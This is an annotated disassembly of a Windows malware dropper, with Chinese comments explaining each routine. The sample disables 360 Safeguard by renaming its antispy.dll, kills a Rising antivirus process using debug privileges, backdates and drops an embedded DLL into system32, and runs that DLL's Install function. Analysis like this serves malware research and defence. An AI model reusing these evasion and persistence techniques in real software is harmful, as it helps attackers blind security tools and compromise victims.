00401674 /$ 81EC 08020000 sub esp, 208
0040167A |. 56 push esi
0040167B |. E8 64FEFFFF call 004014E4 ; 检测360卫士，并废除360功能
00401680 |. 68 9C304000 push 0040309C ; ASCII "RsTrAi.eXe"
00401685 |. E8 2AFEFFFF call 004014B4 ; 检测RSTrai.exe,并结束进程
0040168A |. 83C4 04 add esp, 4 ; 是不是应该是RSTray.exe？？写错了？
0040168D |. 90 nop
0040168E |. 90 nop
0040168F |. 90 nop
00401690 |. 90 nop
00401691 |. 90 nop
00401692 |. 8D8424 080100>lea eax, dword ptr [esp+108]
00401699 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
0040169E |. 50 push eax ; |Buffer
0040169F |. FF15 8C204000 call dword ptr [40208C] ; \GetSystemDirectoryA
004016A5 |. 6A 78 push 78
004016A7 |. 6A 63 push 63
004016A9 |. E8 56F9FFFF call 00401004 ; 获得63-78之间随机数
004016AE |. 83C4 08 add esp, 8
004016B1 |. 50 push eax
004016B2 |. 6A 79 push 79
004016B4 |. 6A 62 push 62
004016B6 |. E8 49F9FFFF call 00401004 ; 获得62-79之间随机数
004016BB |. 83C4 08 add esp, 8
004016BE |. 50 push eax
004016BF |. 6A 7A push 7A
004016C1 |. 6A 61 push 61
004016C3 |. E8 3CF9FFFF call 00401004 ; 获得61-7A之间随机数
004016C8 |. 83C4 08 add esp, 8
004016CB |. 8D8C24 100100>lea ecx, dword ptr [esp+110] ; |system32下生成半随机路径的DLL
004016D2 |. 8D5424 0C lea edx, dword ptr [esp+C] ; |
004016D6 |. 50 push eax ; |<%c>
004016D7 |. 51 push ecx ; |<%s>
004016D8 |. 68 88304000 push 00403088 ; |Format = "%s\R%cm%ct%cC.dll"
004016DD |. 52 push edx ; |s
004016DE |. FF15 38214000 call dword ptr [402138] ; \wsprintfA
004016E4 |. 8D4424 1C lea eax, dword ptr [esp+1C]
004016E8 |. 50 push eax
004016E9 |. 68 84304000 push 00403084 ; ASCII "DLL"
004016EE |. 6A 66 push 66
004016F0 |. 6A 00 push 0
004016F2 |. E8 4DF9FFFF call 00401044 ; 读取资源中的dll，并释放到system32目录中
004016F7 |. 83C4 28 add esp, 28
004016FA |. 8D4C24 04 lea ecx, dword ptr [esp+4] ; 以下代码为读取释放的dll,并运行dll中install函数
004016FE |. 51 push ecx ; /FileName
004016FF |. FF15 88204000 call dword ptr [402088] ; \LoadLibraryA
00401705 |. 8BF0 mov esi, eax
00401707 |. 85F6 test esi, esi
00401709 |. 74 1E je short 00401729
0040170B |. 68 7C304000 push 0040307C ; /ProcNameOrOrdinal = "Install"
00401710 |. 56 push esi ; |hModule
00401711 |. FF15 84204000 call dword ptr [402084] ; \GetProcAddress
00401717 |. 85C0 test eax, eax
00401719 |. 74 07 je short 00401722
0040171B |. 8D5424 04 lea edx, dword ptr [esp+4]
0040171F |. EB 19 jmp short 0040173A
00401721 | 90 nop
00401722 |> 56 push esi ; /hLibModule
00401723 |. FF15 80204000 call dword ptr [402080] ; \FreeLibrary
00401729 |> E8 96FAFFFF call 004011C4
0040172E |. 33C0 xor eax, eax
00401730 |. 5E pop esi
00401731 |. 81C4 08020000 add esp, 208
00401737 |. C2 1000 retn 10
0040173A |> 52 push edx
0040173B |. FFD0 call eax ; 运行dll中的install函数
0040173D \.^ EB E3 jmp short 00401722

004014E3 90 nop ; 检测是否存在360卫士
004014E4 /$ 81EC 50040000 sub esp, 450 ; 将360卫士的antispy.dll重命名为WS2_32.dll
004014EA |. 53 push ebx
004014EB |. 6A 00 push 0 ; /ProcessID = 0
004014ED |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
004014EF |. C74424 0C 280>mov dword ptr [esp+C], 128 ; |
004014F7 |. C78424 380200>mov dword ptr [esp+238], 224 ; |
00401502 |. E8 A9080000 call 00401DB0 ; \CreateToolhelp32Snapshot
00401507 |. 8BD8 mov ebx, eax
00401509 |. 85DB test ebx, ebx
0040150B |. 0F84 55010000 je 00401666
00401511 |. 55 push ebp
00401512 |. 8D4424 08 lea eax, dword ptr [esp+8]
00401516 |. 56 push esi
00401517 |. 50 push eax ; /lppe
00401518 |. 53 push ebx ; |hSnapshot
00401519 |. E8 8C080000 call 00401DAA ; \Process32First
0040151E |. 8B2D B8204000 mov ebp, dword ptr [4020B8] ; kernel32.CloseHandle
00401524 |. 85C0 test eax, eax
00401526 |. 0F84 35010000 je 00401661
0040152C |. 8B35 30214000 mov esi, dword ptr [402130] ; SHLWAPI.StrStrIA
00401532 |> 8D4C24 30 /lea ecx, dword ptr [esp+30] ; 查查找是否有360Tray.exe进程存在，如果有转到40155E
00401536 |. 68 70304000 |push 00403070 ; ASCII "360tRaY.eXe"
0040153B |. 51 |push ecx
0040153C |. FFD6 |call esi
0040153E |. 85C0 |test eax, eax
00401540 |. 75 1C |jnz short 0040155E
00401542 |. 8D5424 0C |lea edx, dword ptr [esp+C]
00401546 |. 52 |push edx ; /lppe
00401547 |. 53 |push ebx ; |hSnapshot
00401548 |. E8 57080000 |call 00401DA4 ; \Process32Next
0040154D |. 85C0 |test eax, eax
0040154F |.^ 75 E1 \jnz short 00401532
00401551 |. 53 push ebx
00401552 |. FFD5 call ebp
00401554 |. 5E pop esi
00401555 |. 5D pop ebp
00401556 |. 5B pop ebx
00401557 |. 81C4 50040000 add esp, 450
0040155D |. C3 retn
0040155E |> 8B4424 14 mov eax, dword ptr [esp+14]
00401562 |. 50 push eax ; /ProcessID
00401563 |. 6A 08 push 8 ; |Flags = TH32CS_SNAPMODULE
00401565 |. E8 46080000 call 00401DB0 ; \CreateToolhelp32Snapshot
0040156A |. 8BF0 mov esi, eax
0040156C |. 85F6 test esi, esi
0040156E |. 0F84 ED000000 je 00401661
00401574 |. 8D8C24 380200>lea ecx, dword ptr [esp+238] ; 获得文件路径
0040157B |. 51 push ecx ; /pModuleentry
0040157C |. 56 push esi ; |hSnapshot
0040157D |. E8 34080000 call 00401DB6 ; \Module32First
00401582 |. 85C0 test eax, eax
00401584 |. 0F84 D7000000 je 00401661
0040158A |. 56 push esi
0040158B |. FFD5 call ebp
0040158D |. 8D9424 580300>lea edx, dword ptr [esp+358] ; 文件路径中是否包含safemon，如果有就确认是360的进程
00401594 |. 68 68304000 push 00403068 ; /s2 = "safemon"
00401599 |. 52 push edx ; |s1
0040159A |. FF15 E8204000 call dword ptr [4020E8] ; \strstr
004015A0 |. 83C4 08 add esp, 8
004015A3 |. 85C0 test eax, eax
004015A5 |. 0F84 B6000000 je 00401661
004015AB |. 57 push edi
004015AC |. C600 00 mov byte ptr [eax], 0
004015AF |. B9 41000000 mov ecx, 41
004015B4 |. 33C0 xor eax, eax
004015B6 |. 8DBC24 380100>lea edi, dword ptr [esp+138]
004015BD |. 8D9424 380100>lea edx, dword ptr [esp+138]
004015C4 |. F3:AB rep stos dword ptr es:[edi]
004015C6 |. 83C9 FF or ecx, FFFFFFFF
004015C9 |. 8DBC24 5C0300>lea edi, dword ptr [esp+35C]
004015D0 |. F2:AE repne scas byte ptr es:[edi]
004015D2 |. F7D1 not ecx
004015D4 |. 2BF9 sub edi, ecx ; 文件移动
004015D6 |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING
004015D8 |. 8BC1 mov eax, ecx ; |
004015DA |. 8BF7 mov esi, edi ; |
004015DC |. C1E9 02 shr ecx, 2 ; |
004015DF |. 8BFA mov edi, edx ; |
004015E1 |. 8D9424 3C0100>lea edx, dword ptr [esp+13C] ; |
004015E8 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |
004015EA |. 8BC8 mov ecx, eax ; |
004015EC |. 33C0 xor eax, eax ; |
004015EE |. 83E1 03 and ecx, 3 ; |
004015F1 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |
004015F3 |. BF 5C304000 mov edi, 0040305C ; |ASCII "WS2_32.dll"
004015F8 |. 83C9 FF or ecx, FFFFFFFF ; |
004015FB |. F2:AE repne scas byte ptr es:[edi] ; |
004015FD |. F7D1 not ecx ; |
004015FF |. 2BF9 sub edi, ecx ; |
00401601 |. 8BF7 mov esi, edi ; |
00401603 |. 8BFA mov edi, edx ; |
00401605 |. 8BD1 mov edx, ecx ; |
00401607 |. 83C9 FF or ecx, FFFFFFFF ; |
0040160A |. F2:AE repne scas byte ptr es:[edi] ; |
0040160C |. 8BCA mov ecx, edx ; |
0040160E |. 4F dec edi ; |
0040160F |. C1E9 02 shr ecx, 2 ; |
00401612 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |
00401614 |. 8BCA mov ecx, edx ; |
00401616 |. 8D9424 600300>lea edx, dword ptr [esp+360] ; |
0040161D |. 83E1 03 and ecx, 3 ; |
00401620 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |
00401622 |. BF 50304000 mov edi, 00403050 ; |ASCII "antispy.dll"
00401627 |. 83C9 FF or ecx, FFFFFFFF ; |
0040162A |. F2:AE repne scas byte ptr es:[edi] ; |
0040162C |. F7D1 not ecx ; |
0040162E |. 2BF9 sub edi, ecx ; |
00401630 |. 8BF7 mov esi, edi ; |
00401632 |. 8BFA mov edi, edx ; |
00401634 |. 8BD1 mov edx, ecx ; |
00401636 |. 83C9 FF or ecx, FFFFFFFF ; |
00401639 |. F2:AE repne scas byte ptr es:[edi] ; |
0040163B |. 8BCA mov ecx, edx ; |
0040163D |. 4F dec edi ; |
0040163E |. C1E9 02 shr ecx, 2 ; |
00401641 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |
00401643 |. 8BCA mov ecx, edx ; |
00401645 |. 8D8424 3C0100>lea eax, dword ptr [esp+13C] ; |
0040164C |. 83E1 03 and ecx, 3 ; |
0040164F |. 50 push eax ; |NewName
00401650 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |
00401652 |. 8D8C24 640300>lea ecx, dword ptr [esp+364] ; |
00401659 |. 51 push ecx ; |ExistingName
0040165A |. FF15 78204000 call dword ptr [402078] ; \MoveFileExA
00401660 |. 5F pop edi
00401661 |> 53 push ebx
00401662 |. FFD5 call ebp
00401664 |. 5E pop esi
00401665 |. 5D pop ebp
00401666 |> 5B pop ebx
00401667 |. 81C4 50040000 add esp, 450
0040166D \. C3 retn

004014B4 /$ 8B4424 04 mov eax, dword ptr [esp+4]
004014B8 |. 56 push esi
004014B9 |. 50 push eax
004014BA |. 33F6 xor esi, esi
004014BC |. E8 13FFFFFF call 004013D4 ; 查找是否存在rstrai.exe进程
004014C1 |. 83C4 04 add esp, 4
004014C4 |. 85C0 test eax, eax
004014C6 |. 74 0B je short 004014D3
004014C8 |. 50 push eax
004014C9 |. E8 96FFFFFF call 00401464 ; 结束rstrai.exe进程
004014CE |. 83C4 04 add esp, 4
004014D1 |. 5E pop esi
004014D2 |. C3 retn
004014D3 |> 8BC6 mov eax, esi
004014D5 |. 5E pop esi
004014D6 \. C3 retn
------------
004013D4 /$ 81EC 28010000 sub esp, 128 ; 查询进程名是否存在
004013DA |. 53 push ebx
004013DB |. 55 push ebp
004013DC |. 56 push esi
004013DD |. 33ED xor ebp, ebp
004013DF |. 57 push edi
004013E0 |. 55 push ebp ; /ProcessID => 0
004013E1 |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
004013E3 |. E8 C8090000 call 00401DB0 ; \CreateToolhelp32Snapshot
004013E8 |. 8BF0 mov esi, eax
004013EA |. 8D4424 10 lea eax, dword ptr [esp+10]
004013EE |. 50 push eax ; /lppe
004013EF |. 56 push esi ; |hSnapshot
004013F0 |. C74424 18 280>mov dword ptr [esp+18], 128 ; |
004013F8 |. E8 AD090000 call 00401DAA ; \Process32First
004013FD |. 85C0 test eax, eax
004013FF |. 74 40 je short 00401441
00401401 |. 8BBC24 3C0100>mov edi, dword ptr [esp+13C]
00401408 |. 8B1D 30214000 mov ebx, dword ptr [402130] ; SHLWAPI.StrStrIA
0040140E |> 8D4C24 34 /lea ecx, dword ptr [esp+34]
00401412 |. 57 |push edi
00401413 |. 51 |push ecx
00401414 |. FFD3 |call ebx
00401416 |. 85C0 |test eax, eax
00401418 |. 75 23 |jnz short 0040143D
0040141A |. 8D5424 10 |lea edx, dword ptr [esp+10]
0040141E |. 52 |push edx ; /lppe
0040141F |. 56 |push esi ; |hSnapshot
00401420 |. E8 7F090000 |call 00401DA4 ; \Process32Next
00401425 |. 85C0 |test eax, eax
00401427 |.^ 75 E5 \jnz short 0040140E
00401429 |. 56 push esi ; /hObject
0040142A |. FF15 B8204000 call dword ptr [4020B8] ; \CloseHandle
00401430 |. 5F pop edi
00401431 |. 8BC5 mov eax, ebp
00401433 |. 5E pop esi
00401434 |. 5D pop ebp
00401435 |. 5B pop ebx
00401436 |. 81C4 28010000 add esp, 128
0040143C |. C3 retn
0040143D |> 8B6C24 18 mov ebp, dword ptr [esp+18]
00401441 |> 56 push esi ; /hObject
00401442 |. FF15 B8204000 call dword ptr [4020B8] ; \CloseHandle
00401448 |. 5F pop edi
00401449 |. 8BC5 mov eax, ebp
0040144B |. 5E pop esi
0040144C |. 5D pop ebp
0040144D |. 5B pop ebx
0040144E |. 81C4 28010000 add esp, 128
00401454 \. C3 retn

------------------
00401464 /$ 56 push esi ; 结束目标进程
00401465 |. 6A 01 push 1
00401467 |. 68 3C304000 push 0040303C ; ASCII "SeDebugPrivilege"
0040146C |. E8 B3FEFFFF call 00401324 ; 提升进程权限
00401471 |. 8B4424 10 mov eax, dword ptr [esp+10]
00401475 |. 83C4 08 add esp, 8
00401478 |. 50 push eax ; /ProcessId
00401479 |. 6A 00 push 0 ; |Inheritable = FALSE
0040147B |. 68 FF0F1F00 push 1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401480 |. FF15 74204000 call dword ptr [402074] ; \OpenProcess
00401486 |. 8BF0 mov esi, eax
00401488 |. 85F6 test esi, esi
0040148A |. 75 02 jnz short 0040148E
0040148C |. 5E pop esi
0040148D |. C3 retn
0040148E |> 57 push edi
0040148F |. 6A 00 push 0 ; /ExitCode = 0
00401491 |. 56 push esi ; |hProcess
00401492 |. FF15 70204000 call dword ptr [402070] ; \TerminateProcess
00401498 |. 56 push esi ; /hObject
00401499 |. 8BF8 mov edi, eax ; |
0040149B |. FF15 B8204000 call dword ptr [4020B8] ; \CloseHandle
004014A1 |. 8BC7 mov eax, edi
004014A3 |. 5F pop edi
004014A4 |. 5E pop esi
004014A5 \. C3 retn

00401004 /$ 56 push esi ; 获得一个范围内的随机数
00401005 |. 8B7424 0C mov esi, dword ptr [esp+C]
00401009 |. 57 push edi
0040100A |. 8B7C24 0C mov edi, dword ptr [esp+C]
0040100E |. 3BFE cmp edi, esi
00401010 |. 75 05 jnz short 00401017
00401012 |. 8BC7 mov eax, edi
00401014 |. 5F pop edi
00401015 |. 5E pop esi
00401016 |. C3 retn
00401017 |> FF15 D0204000 call dword ptr [4020D0] ; [GetTickCount
0040101D |. 50 push eax ; /seed
0040101E |. FF15 E4204000 call dword ptr [4020E4] ; \srand
00401024 |. 83C4 04 add esp, 4
00401027 |. FF15 E0204000 call dword ptr [4020E0] ; [rand
0040102D |. 83C0 03 add eax, 3
00401030 |. 2BF7 sub esi, edi
00401032 |. 99 cdq
00401033 |. 46 inc esi
00401034 |. F7FE idiv esi
00401036 |. 8BC2 mov eax, edx
00401038 |. 03C7 add eax, edi
0040103A |. 5F pop edi
0040103B |. 5E pop esi
0040103C \. C3 retn

00401044 /$ 81EC 2C020000 sub esp, 22C ; 指定模块中，寻找指定资源
0040104A |. 8D8424 280100>lea eax, dword ptr [esp+128] ; 并将文件写入临时文件夹的[TickCount].tmp
00401051 |. 53 push ebx ; 然后将.tmp文件移动到c:\windows\system32\[string].dll
00401052 |. 56 push esi
00401053 |. 57 push edi
00401054 |. 50 push eax ; /Buffer
00401055 |. 68 04010000 push 104 ; |BufSize = 104 (260.)
0040105A |. FF15 38204000 call dword ptr [402038] ; \GetTempPathA
00401060 |. FF15 D0204000 call dword ptr [4020D0] ; [GetTickCount
00401066 |. 8D8C24 340100>lea ecx, dword ptr [esp+134]
0040106D |. 50 push eax ; /<%d>
0040106E |. 51 push ecx ; |<%s>
0040106F |. 8D5424 38 lea edx, dword ptr [esp+38] ; |
00401073 |. 68 10304000 push 00403010 ; |Format = "%s\%d_res.tmp"
00401078 |. 52 push edx ; |s
00401079 |. FF15 38214000 call dword ptr [402138] ; \wsprintfA
0040107F |. 8B8C24 500200>mov ecx, dword ptr [esp+250]
00401086 |. 8B8424 540200>mov eax, dword ptr [esp+254]
0040108D |. 8BB424 4C0200>mov esi, dword ptr [esp+24C]
00401094 |. 83C4 10 add esp, 10
00401097 |. 81E1 FFFF0000 and ecx, 0FFFF ; 资源号为66的dll
0040109D |. 50 push eax ; /ResourceType
0040109E |. 51 push ecx ; |ResourceName
0040109F |. 56 push esi ; |hModule
004010A0 |. FF15 34204000 call dword ptr [402034] ; \FindResourceA
004010A6 |. 8BD8 mov ebx, eax
004010A8 |. 85DB test ebx, ebx
004010AA |. 75 0A jnz short 004010B6
004010AC |. 5F pop edi
004010AD |. 5E pop esi
004010AE |. 5B pop ebx
004010AF |. 81C4 2C020000 add esp, 22C
004010B5 |. C3 retn
004010B6 |> 53 push ebx ; /hResource
004010B7 |. 56 push esi ; |hModule
004010B8 |. FF15 30204000 call dword ptr [402030] ; \LoadResource
004010BE |. 8BF8 mov edi, eax
004010C0 |. 85FF test edi, edi
004010C2 |. 75 0A jnz short 004010CE
004010C4 |. 5F pop edi
004010C5 |. 5E pop esi
004010C6 |. 5B pop ebx
004010C7 |. 81C4 2C020000 add esp, 22C
004010CD |. C3 retn
004010CE |> 6A 00 push 0 ; /hTemplateFile = NULL
004010D0 |. 68 80000000 push 80 ; |Attributes = NORMAL
004010D5 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
004010D7 |. 6A 00 push 0 ; |pSecurity = NULL
004010D9 |. 6A 02 push 2 ; |ShareMode = FILE_SHARE_WRITE
004010DB |. 8D5424 44 lea edx, dword ptr [esp+44] ; |
004010DF |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
004010E4 |. 52 push edx ; |FileName
004010E5 |. FF15 2C204000 call dword ptr [40202C] ; \CreateFileA
004010EB |. 8BF0 mov esi, eax
004010ED |. 85F6 test esi, esi
004010EF |. 75 0A jnz short 004010FB
004010F1 |. 5F pop edi
004010F2 |. 5E pop esi
004010F3 |. 5B pop ebx
004010F4 |. 81C4 2C020000 add esp, 22C
004010FA |. C3 retn
004010FB |> 33C0 xor eax, eax
004010FD |. 8D4C24 24 lea ecx, dword ptr [esp+24]
00401101 |. 894424 0C mov dword ptr [esp+C], eax
00401105 |. 8D5424 0C lea edx, dword ptr [esp+C]
00401109 |. 894424 10 mov dword ptr [esp+10], eax
0040110D |. 51 push ecx ; /pFileTime
0040110E |. 894424 18 mov dword ptr [esp+18], eax ; |
00401112 |. 52 push edx ; |pSystemTime
00401113 |. 894424 20 mov dword ptr [esp+20], eax ; |
00401117 |. 66:C74424 14 >mov word ptr [esp+14], 7D4 ; |
0040111E |. 66:C74424 16 >mov word ptr [esp+16], 8 ; |
00401125 |. 66:C74424 1A >mov word ptr [esp+1A], 11 ; |
0040112C |. 66:C74424 1C >mov word ptr [esp+1C], 14 ; |
00401133 |. 66:894424 1E mov word ptr [esp+1E], ax ; |
00401138 |. FF15 28204000 call dword ptr [402028] ; \SystemTimeToFileTime
0040113E |. 8D4424 1C lea eax, dword ptr [esp+1C]
00401142 |. 8D4C24 24 lea ecx, dword ptr [esp+24]
00401146 |. 50 push eax ; /pFileTime
00401147 |. 51 push ecx ; |pLocalTime
00401148 |. FF15 24204000 call dword ptr [402024] ; \LocalFileTimeToFileTime
0040114E |. 8D5424 1C lea edx, dword ptr [esp+1C]
00401152 |. 8D4424 1C lea eax, dword ptr [esp+1C]
00401156 |. 52 push edx ; /pLastWrite
00401157 |. 6A 00 push 0 ; |pLastAccess = NULL
00401159 |. 50 push eax ; |pCreationTime
0040115A |. 56 push esi ; |hFile
0040115B |. FF15 68204000 call dword ptr [402068] ; \SetFileTime
00401161 |. 8D4C24 2C lea ecx, dword ptr [esp+2C]
00401165 |. 6A 00 push 0 ; /pOverlapped = NULL
00401167 |. 51 push ecx ; |pBytesWritten
00401168 |. 53 push ebx ; |/hResource
00401169 |. 6A 00 push 0 ; ||hModule = NULL
0040116B |. FF15 B0204000 call dword ptr [4020B0] ; |\SizeofResource
00401171 |. 50 push eax ; |nBytesToWrite
00401172 |. 57 push edi ; |Buffer
00401173 |. 56 push esi ; |hFile
00401174 |. FF15 B4204000 call dword ptr [4020B4] ; \WriteFile
0040117A |. 56 push esi ; /hObject
0040117B |. FF15 B8204000 call dword ptr [4020B8] ; \CloseHandle
00401181 |. 57 push edi ; /hResource
00401182 |. FF15 BC204000 call dword ptr [4020BC] ; \FreeResource
00401188 |. 8BB424 480200>mov esi, dword ptr [esp+248]
0040118F |. 8D5424 30 lea edx, dword ptr [esp+30]
00401193 |. 56 push esi ; /NewName
00401194 |. 52 push edx ; |ExistingName
00401195 |. FF15 C0204000 call dword ptr [4020C0] ; \MoveFileA
0040119B |. 6A 00 push 0 ; /FileAttributes = 0
0040119D |. 56 push esi ; |FileName
0040119E |. FF15 C4204000 call dword ptr [4020C4] ; \SetFileAttributesA
004011A4 |. 8D4424 30 lea eax, dword ptr [esp+30]
004011A8 |. 50 push eax ; /FileName
004011A9 |. FF15 C8204000 call dword ptr [4020C8] ; \DeleteFileA
004011AF |. 5F pop edi
004011B0 |. 5E pop esi
004011B1 |. B8 01000000 mov eax, 1
004011B6 |. 5B pop ebx
004011B7 |. 81C4 2C020000 add esp, 22C
004011BD \. C3 retn